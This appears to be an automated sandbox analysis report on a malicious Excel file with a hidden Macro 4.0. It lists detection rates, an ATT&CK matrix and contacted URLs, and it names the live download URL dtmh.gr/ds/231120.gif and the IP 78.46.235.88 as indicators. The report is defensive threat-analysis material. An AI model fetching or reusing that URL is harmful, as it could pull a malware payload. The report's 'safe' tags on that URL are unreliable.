    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: regsvr32.exe, 00000006.00000002.286115950.0000000004E40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000006.00000002.286115950.0000000004E40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000006.00000002.286115950.0000000004E40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000006.00000002.286115950.0000000004E40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1393356833.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting21NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsExtra Window Memory Injection1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1393356833.xls34%VirustotalBrowse
    document-1393356833.xls11%MetadefenderBrowse
    document-1393356833.xls4%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    dtmh.gr1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%VirustotalBrowse
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    dtmh.gr
    78.46.235.88
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
      high
      https://login.microsoftonline.com/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
        high
        https://shell.suite.office.com:14439FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
              high
              https://cdn.entity.9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                high
                https://wus2-000.contentsync.9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                    high
                    https://powerlift.acompli.net9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v19FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                      high
                      https://cortana.ai9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                high
                                https://api.aadrm.com/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                      high
                                      https://cr.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                            high
                                            https://graph.ppe.windows.net9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                            high
                                                            https://graph.windows.net9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                high
                                                                                                                https://dtmh.gr/ds/231120.gifdocument-1393356833.xlsfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://templatelogging.office.com/client/log9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorize9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v29FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com9FA1F744-8159-4D70-B39C-79B56408DE78.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      78.46.235.88
                                                                                                                                                      unknownGermany
                                                                                                                                                      24940HETZNER-ASDEfalse

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.1

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
